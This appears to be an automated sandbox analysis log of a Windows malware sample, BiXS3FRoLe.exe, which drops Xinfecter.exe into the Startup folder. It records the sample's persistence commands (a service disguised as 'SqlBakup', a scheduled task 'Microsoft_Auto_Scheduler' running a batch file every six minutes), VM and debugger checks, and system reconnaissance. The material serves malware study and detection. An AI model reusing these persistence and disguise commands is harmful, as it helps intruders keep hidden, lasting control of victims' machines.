Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00AE9908 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00AE9908
Source: C:\Windows\SysWOW64\tasklist.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\systeminfo.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\systeminfo.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe | Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\svchost.exe | File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\SysWOW64\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | API coverage: 9.2 %
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | API coverage: 2.5 %
Source: C:\Windows\SysWOW64\timeout.exe TID: 7468 | Thread sleep count: 119 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 5844 | Thread sleep count: 131 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 8012 | Thread sleep count: 131 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 7540 | Thread sleep count: 128 > 30
Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exe | File Volume queried: C:\Windows\System32 FullSizeInformation
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00A88240 SetErrorMode,FindFirstFileW, 0_2_00A88240
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00A88380 SetErrorMode,FindFirstFileW,SetErrorMode,FindFirstFileW, 0_2_00A88380
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00A89ABA lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose,SetErrorMode,FindFirstFileW, 0_2_00A89ABA
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00A8AF50 SetErrorMode,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose, 0_2_00A8AF50
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00B3BA6B FindFirstFileExA, 0_2_00B3BA6B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 48_2_00028240 SetErrorMode,FindFirstFileW, 48_2_00028240
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 48_2_00028380 SetErrorMode,FindFirstFileW,SetErrorMode,FindFirstFileW, 48_2_00028380
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 48_2_0002AF50 SetErrorMode,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose, 48_2_0002AF50
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 48_2_000DBA6B FindFirstFileExA, 48_2_000DBA6B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 48_2_00029ABA lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose,SetErrorMode,FindFirstFileW, 48_2_00029ABA
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00A8D950 GetLogicalDriveStringsA, 0_2_00A8D950
Source: BiXS3FRoLe.exe, 00000000.00000002.2504707100.0000000000D29000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW8
Source: svchost.exe, 00000009.00000002.2504829562.000001E74C64F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: #disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000009.00000002.2504676976.000001E74C62B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: (@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: BiXS3FRoLe.exe, 00000000.00000002.2504707100.0000000000D29000.00000004.00000020.00020000.00000000.sdmp, BiXS3FRoLe.exe, 00000000.00000002.2504707100.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000026.00000002.1340054340.000001F1F6C8C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: svchost.exe, 00000009.00000002.2504497159.000001E74C602000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: svchost.exe, 00000009.00000002.2505170981.000001E74C68E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000009.00000002.2504676976.000001E74C62B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: svchost.exe, 00000009.00000002.2505013739.000001E74C664000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: (@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000es
Source: svchost.exe, 00000009.00000002.2504829562.000001E74C64F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: #Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000009.00000002.2504829562.000001E74C64F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}\\?\Volume{1a4b1382-eeb5-4d59-b0fa-b93f83a518e1}\
Source: C:\Windows\SysWOW64\tasklist.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00B24F58 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00B24F58
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00B100BB LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00B100BB
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00B20E79 mov eax, dword ptr fs:[00000030h] 0_2_00B20E79
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 48_2_000C0E79 mov eax, dword ptr fs:[00000030h] 48_2_000C0E79
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00B002E0 TlsGetValue,TlsSetValue,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 0_2_00B002E0
Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00B24F58 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00B24F58
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00B0176D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00B0176D
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00B01968 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00B01968
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00B01ACA SetUnhandledExceptionFilter, 0_2_00B01ACA
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 48_2_000C4F58 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 48_2_000C4F58
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 48_2_000A176D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 48_2_000A176D
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 48_2_000A1968 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 48_2_000A1968
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 48_2_000A1ACA SetUnhandledExceptionFilter, 48_2_000A1ACA
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ver
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\S-2153.bat'" /f
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo %date%-%time%
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c systeminfo|find /i "original"
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ver
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /v /fo csv
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "dcdcf"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\user\AppData\S-2153.bat'" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\find.exe find /i "os name"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /v
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\find.exe find /I /c "dcdcf"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\find.exe find /I "BiXS3FRoLe.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\find.exe find /I "BiXS3FRoLe.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreak
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "BiXS3FRoLe.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /i "original"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /v
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I /c "dcdcf"
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00A93DD0 GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,DuplicateToken,AllocateAndInitializeSid,LocalAlloc,InitializeSecurityDescriptor,GetLengthSid,LocalAlloc,InitializeAcl,AddAccessAllowedAce,SetSecurityDescriptorDacl,SetSecurityDescriptorGroup,SetSecurityDescriptorOwner,IsValidSecurityDescriptor,AccessCheck,LocalFree,LocalFree,LocalFree,FreeSid,CloseHandle,CloseHandle,CloseHandle,0_2_00A93DD0
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00A93DD0 GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,DuplicateToken,AllocateAndInitializeSid,LocalAlloc,InitializeSecurityDescriptor,GetLengthSid,LocalAlloc,InitializeAcl,AddAccessAllowedAce,SetSecurityDescriptorDacl,SetSecurityDescriptorGroup,SetSecurityDescriptorOwner,IsValidSecurityDescriptor,AccessCheck,LocalFree,LocalFree,LocalFree,FreeSid,CloseHandle,CloseHandle,CloseHandle,0_2_00A93DD0
      Source: Xinfecter.exe, 00000030.00000002.1395053715.00000000008AF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00B01105 cpuid 0_2_00B01105
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: ___crtGetLocaleInfoEx,0_2_00AFC03B
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: GetLocaleInfoW,0_2_00AFC347
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_00B3E50A
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: EnumSystemLocalesW,0_2_00B3E782
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: EnumSystemLocalesW,0_2_00B3E7CD
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00B3E8F5
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: EnumSystemLocalesW,0_2_00B3E868
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: GetLocaleInfoW,0_2_00B3EB45
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: EnumSystemLocalesW,0_2_00B32C30
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00B3EC6E
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: GetLocaleInfoW,0_2_00B3ED75
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00B3EE42
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: GetLocaleInfoW,0_2_00B3311A
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: ___crtGetLocaleInfoEx,48_2_0009C03B
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: GetLocaleInfoW,48_2_0009C347
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,48_2_000DE50A
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: EnumSystemLocalesW,48_2_000DE782
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: EnumSystemLocalesW,48_2_000DE7CD
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: EnumSystemLocalesW,48_2_000DE868
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,48_2_000DE8F5
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: GetLocaleInfoW,48_2_000DEB45
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: EnumSystemLocalesW,48_2_000D2C30
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,48_2_000DEC6E
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: GetLocaleInfoW,48_2_000DED75
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,48_2_000DEE42
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: GetLocaleInfoW,48_2_000D311A
      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\svchost.exe | Queries volume information: C: VolumeInformation
      Source: C:\Windows\System32\svchost.exe | Queries volume information: C: VolumeInformation
      Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
